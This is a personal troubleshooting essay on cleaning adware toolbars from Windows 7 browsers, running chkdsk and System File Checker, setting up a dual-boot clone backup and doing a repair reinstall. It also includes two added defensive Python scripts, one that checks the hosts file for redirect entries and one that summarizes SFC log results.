        In downloading and trying various anti-malware I somehow picked up a piece of malware that attacked (simultaneously) several of my browsers (Mozilla and Chrome), corrupting them with aggressive, redirecting toolbars identified as 'IB Updater' and 'Incredibar'.

        Recover: The Mozilla browser itself soon recognized the attack, saying a side-loaded program had made it unstable, and requested that the newly installed toolbar be disabled. I was able to disable the new toolbar in Chrome too, but to locate and delete this virus I needed anti-malware. The anti-malware HitmanPro worked here. It detected Softonic on my machine, which a web search identified as the source of the toolbar infections. Cleanup was a simple search and delete for filenames including 'softonic'.

SweetIM and SweetPacks (redirect) toolbars (update 3/31/13)
        In March 2013 I got hit with a single massive attack of auto-installing browser toolbars (redirecting to ads). It infected 4 of my 5 browsers: Chrome, Firefox, IE, and Safari, but Opera, my main browser, was totally unaffected, maybe because this is the browser I was using during the attack. The files associated with the infecting toolbars I later found to be identified as: SweetIM, SweetPacks, and xxxx Caddy.

        The attack began with some messages flashing on screen for less than one second, then a few seconds later up came a curious (almost for sure, fake) message that Windows has encountered a problem and will close in one minute so save your work now. And in fact in a minute or so Windows did close and began to reset at which point I powered down (five minutes). The reset was probably needed for the files to fully install, nevertheless when I powered up, I was getting redirected.

        Infection symptom: When a link in an infected browser is clicked, instead you are redirected to an ad site in a new window. Closing the window does get you to the link you want, so your system, while infected and impaired, is at least still functional.

        Recover: I powered up in (F8) safe mode and ran Malwarebytes, and it found a couple of trojans, but deleting them did not fix the problem. Turns out this attack had installed dozens of files and dozens of registry entries.

        The key recovery tool here I found was HitManPro Anti-malware, which I then followed up with a massive file search and deletion using Agent Ransack.  HitManPro found a couple of trojans whose file time was about 3 minutes before Windows went down. This turned out to be the key. Because of the delay I had missed them in my first Agent Ransack search. Now I knew where to look, and as usual I first deleted the (one or two) .exe files, but still the redirects continued. I later went in and took out nearly all the files that came in during that three minute window (dozens, many including SweetIM and SweetPacks in the name). These were the toolbar files, and deleting them got rid of most of the problems. HijackThis hinted that there were registry entries with these names, and sure enough a search of the registry for these filename fragments found dozens, all of which I deleted. All the redirects have stopped, and I think the system is now clean.

Repair virus damaged files with built-in tool 'System File Checker'
        Recover: Did you know the Windows operating system has a (built-in) program that both checks and repairs damaged Windows system files? I didn't. It's Microsoft's 'System File Checker' (sfc.exe), which, run 'as administrator' in a DOS-like command window [sfc /scannow], can in ten minutes painlessly fix many operating system problems.

        In hassling with viruses key system files can get inadvertently damaged. At one point I had two key system virus fighting tools stop working, and no one online seemed to know how to fix them. My Safe mode became barely usable when all its icons disappeared leaving just a black screen with Safe Mode in the four corners. My other problem was Regedit, the Windows registry editor, would not open. I eventually found a single fix for both of these problems: Microsoft's System File Checker (sfc.exe). Running it once fixed both problems.

Windows Startup Repair is (probably) calling SFC (update 3/13)
        Windows has a built-in utility called 'Startup Repair'. It is one of the tools on the Windows 7 backup disk. If Windows can't start, this utility may automatically pop up and run. Look at what Startup Repair says it does: "repairs Windows 7 by replacing important operating system files that might be damaged or missing".  Sound familiar? I have not seen this written anywhere, but I think it is a very good bet that 'Startup Repair' is calling 'System File Checker', the actual command level program that is checking and replacing Windows files! (Repair might also call some other programs too, as it claims to fix the registry.)

        I never realized until recently that 'System File Checker' and 'Windows Startup Repair' are (very likely) the same repair utility. 'Windows Startup Repair' just provides Windows' access to the command level utility SFC, which, if Windows is running normally (or maybe in Safe mode), can be accessed directly via a command box. (I have seen dozens of articles on Startup Repair and no one ever mentions or explains this!)

        Once started you find you can't cancel out of Windows Startup Repair, and (very frustratingly) it provides no hint as to how long it will take to complete, which I recently found is something like 15 to 30 min, consistent with running SFC. The only diagnostic it provides when it finishes is a window saying it either 'was' or 'was not' able to repair Windows. I suspect strongly this is very deceptive. SFC might fix a bunch of files, but if there is just one it can't fix, it reports it couldn't fix all files. I bet Windows Startup Repair would then report it couldn't repair Windows, but there is still a good chance that it has fixed a lot of files and maybe Windows will start.

        This is now the case on my machine. When I first ran SFC, it always reported all files fixed, but no more. There is apparently one non-critical file it now can't fix, so it now always reports it could not fix all files and to consult its (cryptic) log. When recently during a virus recovery Windows wouldn't start and Startup Repair auto-ran, it reported it couldn't fix Windows. But right after, Windows did in fact start, so running Windows Startup Repair (SFC) probably did fix one or more critical files damaged by the virus or virus recovery.
---------------------------
Tip
        Very quick 'hosts' file check: Open HijackThis, hit scan --- This scan takes all of one second. Normally the 'hosts' file can be both read and written, so if HijackThis warns it had trouble writing the file, it means some virus has messed with it.
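The following is an added example (not code from this essay) that automates the 'hosts' file check described in the hosts section above and in this tip. It reads the file's active entries and reports any that point a hostname somewhere other than the local machine, which is what the virus's redirect lines do, and it checks whether the file is still writable, the same thing HijackThis is warning about when it has trouble writing the file. The file path is the standard Windows 7 location; the sample hosts contents, and the hostnames and address in it, are constructed for the example.

```python
"""Check a Windows 7 'hosts' file for virus-added redirect entries.

Added example; it is not code from the essay. A clean hosts file holds
only comments, localhost lines, and (if you use a blocking list such as the
MVPS one) entries that point names at 127.0.0.1 or 0.0.0.0. Any entry
that points a name at some other address is a redirect, which is what the
infections described in the essay added at the end of the file.
"""
import ipaddress
import os

# Standard location of the file on Windows 7 (assumed default install).
DEFAULT_HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"


def parse_hosts(text):
    """Return (line_number, address, [hostnames]) for every active entry."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # strip comments
        fields = line.split()
        if len(fields) < 2:
            continue                              # blank or malformed line
        entries.append((lineno, fields[0], fields[1:]))
    return entries


def suspicious_entries(text):
    """Entries whose address is not loopback (127.x / ::1) or 0.0.0.0 / ::."""
    flagged = []
    for lineno, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            flagged.append((lineno, addr, names))  # not even a valid address
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue                               # harmless: local or blocked
        flagged.append((lineno, addr, names))
    return flagged


def hosts_is_writable(path=DEFAULT_HOSTS_PATH):
    """True if the current user can write the file; this is the check behind
    HijackThis's 'trouble writing hosts' warning (run elevated for a
    meaningful answer)."""
    return os.path.isfile(path) and os.access(path, os.W_OK)


# Constructed sample: the stock Windows 7 file with two redirect lines
# tacked onto the end. The hostnames and the address are made up.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
0.0.0.0 ads.example-blocklist.test
198.51.100.23 www.example.com
198.51.100.23 download.example.net
"""

if __name__ == "__main__":
    # Check the live file if it is there, else demonstrate on the sample.
    if os.path.isfile(DEFAULT_HOSTS_PATH):
        with open(DEFAULT_HOSTS_PATH, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        print("hosts writable:", hosts_is_writable())
    else:
        text = SAMPLE_HOSTS
    for lineno, addr, names in suspicious_entries(text):
        print(f"line {lineno}: {addr} -> {' '.join(names)}")
```

On the sample this reports the two lines at the end of the file (lines 6 and 7) and ignores the 0.0.0.0 blocking entry; on a clean machine run elevated it should print nothing and report the file as writable.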

References
        This posting on Malwarebytes forum warns of computers infected with backdoor trojans that don't leave any tracks and can allow crooks to upload stuff from your machine. At the end are lots of links to virus articles

         http://forums.malwarebytes.org/index.php?showtopic=113370

Good info on the 'hosts' file

         http://winhelp2002.mvps.org/hosts.htm

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Setting up dual boot clone backup
after Window 7 reinstall

Introduction
       After a failed Windows installation repair, a failed image backup, and then a month of drudgery reinstalling Windows 7 plus all my programs, I decided no more. I don't want to do this again!

        After doing some reading I decided that cloning, an approach often used by the pros, was the way to go. When I saw references to clone drives, however, they would usually speak of physically swapping in the clone for the main hard drive. Swapping cables may be easy for pros with an open computer on a lab bench in good light, but it is a different thing entirely in a home setup. My computer sits on the floor in a tangle of cables, jammed in between stuff in dim light.  In the 2 or 3 years I have owned it, it had never been opened. I didn't want to have to open it to swap cables if the main drive was failing. I wanted to have a way to switch between my main drive and clone drive without opening the case.

        Never did find a good reference on how to do what I wanted to do even though I did a lot of reading. But with a lot of testing, a lot of trial and error, going down and backing out of blind alleys, I made progress. Acquiring and evaluating tools and ordering parts took a lot of time. In the end I ended up with a clean simple clone backup system that does just what I wanted it to do.

My clone backup system (4/15/14)
        I've got cloning set up and working to protect my computer. While I went down a lot of blind alleys trying to figure it out, the final result is simple and operates slick. It's not a RAID setup; I don't want a real time 'mirror' image. I am using clone software to periodically copy my main hard drive to the clone drive and make it bootable. Cloning takes only 20 min (in background) for 50 Gbytes. My computer can boot and run from either drive with all programs, data, and settings intact. With the case closed I will be able to switch between the drives in two ways:

        1) Dual boot --- built into Windows 7, boot pauses for a few seconds allowing clone drive to be selected
        2) Power switches for individual drives mounted on a rear bracket. (Found on Ebay.)
Dual boot system with 2nd drive as a clone of the primary drive
       With both drives powered, the non-booting drive has its c:\ files show up under letter f:\. It looks like a normal drive that can be read and written to by Explorer, allowing its data files to be individually updated. When I reverse the drives at boot, the c:\ and f:\ folders switch and the 2nd drive's desktop comes up. It's basically a general dual boot system where I am using the 2nd drive as a clone of the primary drive.

Setting up a clone backup system
       Took me a long time to figure out how to set it up, evaluate tools, etc, but the final result is simple. Here are the steps:

    * Buy an internal (sata) drive the same size or larger than existing internal drive

    * (optional) Buy a sata-to-USB drive kit ($20). This provides a power supply brick for the hard drive, plus cables. This lets the new drive just sit outside the case at the beginning, powered by the brick, and provides a long sata cable to plug it into the motherboard. I found my desktop HP motherboard had five sata (standard drive serial link) connectors, three of which were free.

     * Download free (or trial) clone software and use it to format and clone the main drive to the new drive. After testing several I like Casper 8, which at end of 30 day free trial I will buy for $50.

     * Download EasyBCD to help set up dual boot. Dual boot is native to Windows 7, but free utility EasyBCD makes setting it up much easier than trying to use the techy Windows commands.

Mounting 2nd drive
        You now have a working clone setup you can control from outside the case. There are now two choices for mounting the 2nd drive: either mount the clone drive inside the case, powered from the internal power supply, or, if you buy the right enclosure and a bracket for your case, mount it outside.

       The outside mount choice is an enclosure for a sata (internal) drive that has a 'esata' connector. Esata is the internal sata bus of the motherboard brought to the outside, sometimes with no buffering. From a signal integrity point of view this gives me the willies. Inside sata cables are two transmission lines operated at Ghz clock rates. When sata bus is fed out the back of PC and through a similar connector on drive enclosure you have not only lengthened the signal path, but added two connectors into the path. Still I see 'esata' ports appearing on new computers and cable up to 6' for it being sold, so it must work.

        I am probably going to try both approaches, maybe I'll have one clone inside and another outside as internal drives are cheap. I have ordered an esata enclosure but it has not yet arrived. Data integrity issues aside, I am positive the dual boot setup will work over esata, because the motherboard can't tell the difference. (At least this is the case when a motherboard sata port is fed out the back without buffering, there might be an issue if a sata card is used in the PC.)

        Another option may be USB 3, which my new enclosure also will have. I suspect that booting Windows 7 from USB drive, which it does not natively support, can be done, but in my earlier testing I didn't know enough to get it to work.

Boot failure, system crashes (2/24/14) (3/5/14)
        Without (much) warning on a routine Restart my computer refused to boot. After about two hours and dozens of power down reboots, I finally got it to successfully boot, and in the process I learned a few things. However, I was not out of the woods, clearly my machine was unstable because in the next couple of weeks I had several surprise crashes (blue screen of death with auto-reboot). There was no indication that the cause of this was a virus. I had had no virus attacks in many months. It didn't come on suddenly, and none of my many virus scanners ever found anything.

History prior to boot crash
       Prior to the crash, for the last couple of months or so my computer had been a little wonky, but still usable. The main weirdness was a strange delay of several minutes after boot before some programs would run, but after this delay it would run pretty well. The Chrome browser would always run quickly, but other browsers, photo display programs, even Microsoft utilities like Recycle Bin or System Restore would not open for a few minutes when clicked. When I would open device manager, there they would be (running), so I would have to click and 'end process' to clear the decks. But in a few minutes the delayed programs would suddenly open. It was like something was running, but I couldn't figure out what. Rkill always reported nothing running, and scan utilities found nothing. I have not had a virus attack in months.

        There were other weirdnesses too. When I requested a Power Down (or Restart) the system would often hang while exiting. It would just sit (for minutes) waiting for (non existent) programs to close, forcing me to hold the power button down. And my favorite video player KMPlayer had problems. It played most files OK, but when I clicked to open certain (recorded) files it would massively crash KMPlayer to the extent that I often couldn't get to system manager (using the Ctrl Alt Del interrupt) to shut it down.

USB drive problem?
       There are also hints that one of my two backup USB drives (2 Tbyte #2) may be causing trouble. While files on it are generally accessible, Disk Check on it will not run to completion. Also on powerup I occasionally see an auto-run window for this drive pop up, which it should not. I have yet to address this issue. It's my 2nd backup drive, so I should probably take it off line, clean it (reformat it?) and then recopy stuff from backup #1 to it.
        After running chkdsk once or twice, I clicked the scan for bad sectors option (takes a lot longer to run), but I think this was important in that it detects and fixes more problems. After running chkdsk this way a couple of times, I could tell it was working because many wonky weirdnesses disappeared. For example startup was cleaner and Windows would exit too without hanging. Fingers crossed that crashes are a thing of the past, but this will take some time.

Boot details
Symptoms
        Windows would begin the boot process (spinning logo comes up) but would soon drop me into a text box with two options: Start Windows Repair (Recommended) or Start Windows normally. The 2nd choice (Restart Windows normally) would always fail and just return me to this same screen.

        As a first step I unplugged all USB devices (including two USB hard drives, a USB TV tuner and a USB scanner) and left them unplugged while I worked the problem. I have seen in the past that a bad USB device, usually a USB hard drive, could cause boot failure. Didn't fix the boot problem this time.

        The 1st choice would show 'loading files' and then in a couple of seconds bring up a (blank) 'sunrise' graphic with no text of any kind. I waited 5 to 10 minutes a few times and nothing ever changed, just this blank hi-res screen, sometimes with a cursor. This was a Windows screen I don't ever remember seeing before. The only way to exit the sunrise screen was to hold down the power button, whereupon the process repeated and I ended up back at this screen again. After repeated attempts, I was getting nowhere. It sure acted like a hang at the sunrise screen with no way to get to the Recovery utilities. (Ctrl Alt Del did nothing.)

        However, I later came to suspect that Windows Repair might have been running in this 'sunrise' screen without giving any indication it was running or that anything at all was happening. (Typical Microsoft!)
        During various boots I tried F11 and F9 to get to safe mode, system restore, diagnostics, anything to break out of the loop. One time (somehow) PC Doctor diagnostics came up and all hardware tests were passed. A dead end; still no boot, could not get to safe mode or system restore or disk recovery screens, always ended 'hung' at the sunrise screen.

Progress -- Windows Recovery Disk
        Doing a little research with my tablet found mention of using Windows Recovery Disk to access Windows Recovery menu. I had made such a disk 15 months ago and it was leaning up against my desktop machine. Rebooted with the recovery disk in the DVD drive, and this got me to the Windows Recovery menu.

        But I was dismayed to see that System Restore, which I thought might save me, was blanked out. I have been diligent for the last year at every boot to make sure I always had several restore points, adding new ones when good old Windows 7 deleted them, but here, just when I might need it, it looked like I probably had no restore points! (Yup, when I recovered I found no restore points, and I know I had had several only the previous day. So the latest, failed, boot attempt must have wiped them out! While this utility has saved me from many viruses, it has a distressing tendency to fail just when you need it.)

        I ran the Windows diagnostic (again) from the Windows Recovery menu and this time it now (twice) reported a disk failure, whereas a few minutes earlier the hard drive had passed all its tests. (Another bogus report?)

More Progress
        I finally got on the road to recovery running Startup Repair from the Windows Recovery menu accessed via the Windows Recovery Disk. This time instead of a blank 'sunrise' screen I got a normal Startup Repair box with a moving activity bar and a little bit of diagnostics.

        Startup Repair I now think runs two utilities: sfc.exe (System File Checker) to repair system files (from the backup on the D drive), and it now told me it was checking and fixing my hard drive, almost for sure running chkdsk c:\ (advising that this could take over an hour). From my notes earlier in this essay, Startup Repair can take 15 to 30 minutes to run (but this may be without the chkdsk utility). After running a while, it told me it was repairing my disk errors, which a detail box reported as 'System: volume on disk is corrupt', but later reported it had 'successfully completed', so I presumed it fixed it.

Progress?
        I am now getting hopeful. Startup Repair had probably run the two most important boot fix utilities available on Windows: System File Checker to fix key Windows files, and chkdsk to fix various hard drive errors. When in 30 min or so Startup Repair told me it was done, and did I want to reboot? Yes, of course, and guess what? The boot failed and again I ended up right back at the blank 'sunrise' screen I had been in an hour earlier! But I have read, and now know from experience, that running repair utilities more than once is sometimes necessary.

My last chance
       With no other options available, back at the sunrise screen 'hang' I just left the PC alone hoping Startup Repair might be running in the background (I now believe it was), and I knew this could easily take 30 min to run. So I went to read a book, and sure enough in 20 min or so the screen began to change, and now having run System Repair utilities twice over the last hour, the system booted normally.

Post boot failure clean up
        Windows 7 has two very useful repair utilities: System File Checker (sfc /scannow) and Check Disk (chkdsk). The former fixes (replaces) damaged system files (from a cache on the d: drive) and the latter fixes hard drive (linking) errors. Running these multiple times can fix errors a single pass misses. Even though they were both run (twice I think) by Windows during the 2 hr boot recovery marathon, my plan was to run them again (once or twice) the next morning.

        Check Disk --- 'chkdsk' is a Microsoft disk utility that has been around since the days of DOS. The Windows version takes 10-15 minutes to run and when run manually it gives a running account of progress. It cannot be run when Windows is open; you 'schedule' it to run the next time Windows starts. The procedure is this: open a directory, go to the 'c' root, right click and select 'Properties'. In Properties click 'Tools', under '(disk) Error Checking' select 'Check Now', verify the (default) option 'automatically fix file system errors' is ticked, then click yes to schedule it to run on the next start.

        System file checker --- This is tricky to run (see elsewhere in this essay for details), but can be run in about 10 min from within Windows. Briefly it requires opening a Command window (in Accessories) with a right click to 'Run as Administrator'. Then in default dir type 'sfc /scannow'. It provides a running account of the % processed.

        Next day I scheduled a 'chkdsk', powered down and it ran on power up (missed its final message). Then I ran sfc. For the first time System File Checker did not run to completion. It paused at 45% completed, and after a couple of minutes exited with the message 'Windows Resource Protection could not perform the requested operation'. First time I have ever seen it do this. I ran it a second time and same thing, stopped and exited at 45%. Still the system is now continuing to boot OK. Later, after running the check disk program, System File Checker ran to 100%, once saying all OK, once saying there was an error it couldn't fix.

Window repair
        There are several repair tools for Windows 7. Two are built-in and safe and easy to use: 'Chkdsk' scans the hard drive and can repair file links and remove bad disk sectors. 'System File Checker' can repair Windows files. It does this using the archive version of Windows on the d:\ drive. Windows files on the c:\ drive are compared to the archive Windows files on d:\. How exactly the program does this is not explained by Microsoft. My guess is that it is more than a simple file compare, that some sort of hash (or whatever the jargon is) is used to assess which version of the file is intact and which is in error.

Driver reinstall (3/25/14 update)
        There's another aspect of Windows that can go wrong that I did not appreciate until later. After the reinstall, and especially after I installed Acronis True Image backup software (free with a new WD USB hard drive), I had all kinds of problems with Explorer. Directories would stop working, I would see memory usage of Explorer climb to near 90,000, and when powering off Windows would give the message it was waiting for Explorer to respond. Even without these crippling problems the response of the machine was sluggish. System File Checker always reports no problems.

        I found I was able to fix the Explorer/directory problems by reinstalling USB drivers. I saw this recommendation in a Windows fix article. In Device Manager click USB Root Hub, Uninstall. There are six Root Hubs, one I presume for each of my six USB ports. What happens is that in a minute or so Windows on its own reinstalls the driver, popping up the usual box it does when USB drivers are installed. This fixes the Explorer problem for a while, but it keeps coming back.

        I suspect the root cause of this Explorer problem is the Acronis backup software which I just installed a couple of days ago. Acronis buries itself deep into the system. It has created two virtual drives that show up in Device Manager. And Acronis does not appear to be working right; it crawls, but it does barely work, and it successfully recovered the Freecoder program directory from my Windows image backup. I later tried to use it to recover some video files, but only recovered three, and while their length looked right, none of them would play. I am trying now to uninstall Acronis, but the uninstall appears to hang. I'm going to try from safe mode.


        A much bigger, more difficult repair is a 'repair install'. This is a replacement of all the Windows files on the c:\ and d:\ drives from an archive DVD that can be made by the user from a (free) downloadable complete version of Windows 7 provided (sort of) by Microsoft. On paper this looks attractive, as the claim is it can replace all your Windows files while leaving your desktop, programs, and data files untouched (some drivers may get lost and need to be reinstalled). However, it does take a lot of hours, and my one experience with it was not good. The repair install hung half way through, leaving me with a totally mangled OS.

'chkdsk' and 'sfc /scannow'
       To try and stabilize my system I did two things. One, I uninstalled a few programs that I could see were running a lot of background programs (Skype) or were annoying and no longer seemed useful (Malwarebytes). Two, I repeatedly ran Windows' two key (safe) self repair programs: 'chkdsk' and 'sfc /scannow'.  'Chkdsk' first on the 'c' and 'd' drives, then 'sfc /scannow'. I believe these are the two programs that the Windows repair disk program 'Repair Windows' calls, and I believe they are safe to run at any time.

                           chkdsk              check disk; repair and recover bad sectors
                           sfc /scannow        check and replace damaged system files using the 'd' drive system file archive

        'Chkdsk' (check disk) checks the disk files and importantly can do some recovery and repair of bad disk segments. This program has been around since DOS days. It can check the (small) 'd' drive in a few minutes, but a full check of the 'c' drive (tick the 'scan for bad sectors' box) takes several hours. I first ran this during the day where I could monitor what files it was fixing. I found a half dozen files with bad sectors. Running it at night leaves no fix info on screen. I don't know if it is logged, but it probably is.

Access 'chkdsk'
         (preferred) In directory right click 'c' or 'd' drive, Properties, Tools, Check disk for Errors. For the 'c' drive it will respond it cannot check the disk with Windows running, but suggests you schedule a disk check on the next power up.

         (alternate) I read chkdsk can also be run from the Command Prompt (as administrator). I have not run it this way, but I verified 'chkdsk /?' works in the default directory. (For the c: drive it should respond with (y/n) to schedule it to run on the next powerup.)

                        chkdsk  /f  /r  c:              /f is fix errors,   /r is locate bad sectors and recover information

        'Sfc' (system file check) checks system files (and registry too it says) on 'c' drive against an archive of system files on 'd' drive, and importantly it can do repairs of bad system files by replacing them from clean versions on the 'd' drive. Clearly you want the 'd' drive as clean as possible before running this program. When I started working this stabilization work, 'sfc' would only run to 45% and then exit, but after running 'chkdsk' on the 'd' drive 'sfc' ran to completion. This program takes only 10-15 minutes to run and updates the % as it runs.
Access 'sfc /scannow'
        From within Windows, Start, Accessories, Command Prompt (right click Command Prompt and choose ' Run as Administrator' (important). In the default directory just type 'sfc /scannow' (enter). (note space)
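Added example, not code from this essay: sfc /scannow records what it did for each file in %windir%\Logs\CBS\CBS.log (the 'cryptic' log the scan tells you to consult, mentioned earlier), on lines tagged '[SR]' in among thousands of unrelated servicing lines. The script below pulls out the [SR] lines and separates the files it repaired from the files it could not repair, which turns a bare 'could not fix all files' result into a list of what was actually left unfixed. The sample log lines are constructed in the style of the real log; the component and file names in them are made up.

```python
"""Summarize a System File Checker run from CBS.log.

Added example, not from the essay. 'sfc /scannow' writes a line per file
it checks or repairs into %windir%\\Logs\\CBS\\CBS.log, tagged "[SR]", in
among thousands of unrelated servicing lines. This pulls out the [SR]
lines and separates the files it repaired from the ones it gave up on, so
a "could not fix all files" result can be read as what was actually left
unfixed.
"""
import os
import re

# Default log location (assumes SystemRoot is C:\Windows when unset).
DEFAULT_CBS_LOG = os.path.join(
    os.environ.get("SystemRoot", r"C:\Windows"), "Logs", "CBS", "CBS.log")

# Timestamp at the start of every CBS.log line, then anything up to [SR].
SR_LINE = re.compile(
    r"^(?P<stamp>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}).*\[SR\]\s+(?P<msg>.*)$")
# Quoted names inside a message; the file name is the last one.
QUOTED = re.compile(r'"([^"]+)"')


def sr_entries(log_text):
    """Return [(timestamp, message)] for every [SR] line, in order."""
    out = []
    for line in log_text.splitlines():
        m = SR_LINE.match(line)
        if m:
            out.append((m.group("stamp"), m.group("msg").strip()))
    return out


def summarize(log_text):
    """Split [SR] messages into repaired files and files SFC could not fix."""
    repaired, unrepairable = [], []
    for _stamp, msg in sr_entries(log_text):
        names = QUOTED.findall(msg)
        name = names[-1] if names else msg
        if msg.startswith("Cannot repair member file") or \
           msg.startswith("Could not reproject corrupted file"):
            unrepairable.append(name)
        elif msg.startswith("Repairing corrupted file"):
            repaired.append(name)
    return {"repaired": repaired, "unrepairable": unrepairable}


# Constructed sample in the style of CBS.log; component and file names are
# made up, the message wording follows the real [SR] lines.
SAMPLE_CBS_LOG = r"""
2014-03-05 09:12:01, Info                  CBS    Loaded Servicing Stack v6.1.7601.17592
2014-03-05 09:12:03, Info                  CSI    00000006 [SR] Verifying 100 (0x0000000000000064) components
2014-03-05 09:12:03, Info                  CSI    00000007 [SR] Beginning Verify and Repair transaction
2014-03-05 09:12:40, Info                  CSI    00000008 [SR] Cannot repair member file [l:24{12}]"example1.dll" of Example-Component, Version = 6.1.7600.16385, Culture neutral, hash mismatch
2014-03-05 09:13:10, Info                  CSI    00000009 [SR] Repairing corrupted file [ml:520{260},l:46{23}]"\??\C:\Windows\System32"\[l:24{12}]"example2.dll" from store
2014-03-05 09:13:12, Info                  CBS    Unrelated servicing line with no SR tag
2014-03-05 09:15:00, Info                  CSI    0000000a [SR] Verify complete
2014-03-05 09:15:01, Info                  CSI    0000000b [SR] Repair complete
"""

if __name__ == "__main__":
    # Read the live log when present, else demonstrate on the sample.
    if os.path.isfile(DEFAULT_CBS_LOG):
        with open(DEFAULT_CBS_LOG, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CBS_LOG
    result = summarize(text)
    print("repaired:    ", result["repaired"])
    print("unrepairable:", result["unrepairable"])
```

Run it from an elevated prompt after a scan; CBS.log accumulates across runs, so if you want only the latest scan, note the time you started sfc and ignore [SR] entries with an earlier timestamp.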
        There exist other Windows repair programs too, like a program to check and repair the master boot partition ('MBx' ?), but I read this is dangerous and for the specialist who knows all about disk partitions (which is not me). There's also 'msconfig' that allows configuring which programs can run at startup, but I didn't use this either as it looks complicated and I suspect could easily cause harm.

More advanced Windows7 repair tools
        It looks like the best place to find in-depth repair tools is YouTube. The videos can walk through a lot of detailed steps a lot quicker than written text. I only did a quick look on YouTube, but I found more utilities. One is a boot repair utility, you can do something called re-registering your DLLs, and the last and most difficult and most capable is a reinstall of Windows that doesn't wipe your disk.

Msconfig
        Type Msconfig in the search box. A video on advanced troubleshooting points out this provides a lot of safe boot choices (logging, etc) that can be used to diagnose boot and startup problems.

Pure Leads
        I took a quick look and found something called 'PureLeads' that starts at boot up that I don't remember and smells like some sort of advertising crap. (It has a bunch of .exe files all dated seven weeks ago, 1/23/14.) Sure enough a google search shows this to be adware, and from the date it showed up it might be responsible for the strange slow down I find at boot. I just uninstalled it, and will check to see if it stays uninstalled.
Repair re-install of Windows7 (preserving programs)
         Turns out that you can do a 'repair' reinstall of Windows 7 that preserves (apparently) not only your data but your programs! It's an install without reformatting. It seems like it just puts a new set of Windows programs on the disk. It requires the Windows 7 (original) install DVD disks (not the recovery disk) and the Windows 25 digit CD code (on a sticker on the side of the computer, and recoverable from the registry with a free utility from Magical Jelly Bean). The re-install must be done from the Windows desktop. Select the option 'Upgrade'.
 Does 'Upgrade' function as 'repair'?
      From the screen below you can see that what the video calls a 'repair' re-install is an option Microsoft seems to have included in the Windows installation to allow users to 'upgrade' Windows. Does it really do what the video claims? I suspect it probably does, but there are three underlying assumptions:

                1) Allows the same version of Windows to be re-installed (with online updates)
                                    (This is what the video claims to show.)
                2) Replaces all Windows files
                3) Replaces the d:\ drive archive version of Windows

Microsoft forum on upgrade windows repair
        Here's what looks like a Microsoft (sponsored) forum that explains how and when to use Windows upgrade to repair Windows (preserving data and programs). On a quick scan it pretty much says what the video says. This site has a very detailed roadmap with warnings and restrictions. It warns this is a big effort with risk. Stuff like device drivers can be lost. What is very poorly described is exactly what disks you need to make this work. I bought some disks from HP (marked recovery, but store people tell me they will install Windows 7 on a new drive), but I can't tell from these vague descriptions whether these disks can be used or not (except by trying it). My disks may or may not work.
Upgrade/repair Windows disks
        There are two basic types of Windows disk: recovery and install. The former can be created by the computer and only provides access to recovery and repair tools. It does not have the full Windows on it, hence cannot be used to install or repair. I am beginning to suspect that all Windows installation disks have an upgrade option, which can be used for repair, even if they say the opposite! Install disks can come with or without keys, and they can be restricted to just one computer or a specific computer. The set I bought from HP ($12) is for just my HP model (with no key), but my old key should work.
        ** Disks may not be needed! The Windows site below has links to downloadable file (and a boot too) that it says can be used to do a repair install.
         http://www.sevenforums.com/tutorials/3413-repair-install.html

        ** $95 Windows 7 Home Premium install DVD with SP1 (with key) sold by Amazon (plain wrapper) linked from the above site, which the listing says is only for installing on blank drives (users who build their own computers buy it), however it has many other uses. Upgrade from Vista (preserving programs, said one reviewer). A few people buy them just to get a Windows key (to activate the xxxx.iso DVD install) and don't use the disks. Several reviewers report using this Windows 7 DVD to erase Windows 8 and replace it with Windows 7.

        This latter use is very interesting. With this DVD in hand in the future you should be able to buy any Windows 8 computer retail and pop in this DVD. At boot it will not only replace Windows 8 with Windows 7, but it will (in a stroke) eliminate all the crap software that infects all retail computers. While as of March 2014 you can still buy computers with Windows 7 installed, this is going to stop at some point. Microsoft had announced that sale of Windows 7 computers would cease in fall 2014 (two years after Windows 8 came out), but has now retracted that date and there is no firm date. Still, at this time getting a new computer with Windows 7 from a manufacturer is getting hard. First, you probably need to order a new computer online as you are unlikely to find a Windows 7 computer in stores. Second, hardware choice for some reason is limited. I checked the HP site. I expected that Windows 7 would be an option on any computer sold, but it's not. Three computers are offered with Windows 7 (only) and all the others, including the cheapest, are only sold with Windows 8.

    http://www.youtube.com/watch?v=RC_5eb9wTfk               'Repair Install to Fix Windows 7 Without Reformatting by Britec'
    http://www.sevenforums.com/tutorials/3413-repair-install.html
    http://www.heidoc.net/joomla/technology-science/microsoft/14-windows-7-direct-download-links#
    http://windows.microsoft.com/en-us/windows/installing-reinstalling-windows#1TC=windows-7       official Window Upgrade install info

         http://www.amazon.com/Windows-Premium-System-Builder-Packaging/dp/B00H09BB16/ref=pd_cp_sw_0
http://www.amazon.com/gp/product/B004Q0PT3I/ref=as_li_tf_tl?ie=UTF8&camp=211189&creative=373489&creativeASIN=B004Q0PT3I&link_code=as3&tag=thestartrekmidip

        The tricky thing I see from the video is Service Packs. If you have Service Pack 1 installed then the code on the CDs probably won't match what's on the computer. A potential big problem, but the video does show you exactly how to find and uninstall the Service Pack, so it is doable. (Using the video below as a guide I do not have Service Pack 1 installed. I have Windows auto upgrade turned off.) So there's another upgrade I could do, but it would (probably) complicate a recovery with the disks I have. As part of the install, he selects go online to update, so it may very well be that the repair install will include Service Pack 1.

        By going to User Accounts (type 'user' in the Start search box) I found out that I am the administrator of my computer. This is shown by a big sunflower box upper right on the User Accounts page with text "(my name), Administrator". Below is how to log into Windows as administrator (required for upgrade/repair install):
                 right click Command Prompt: Run as administrator
                 type:    net user administrator /active:yes          activate
                          net user administrator /active:no           de-activate
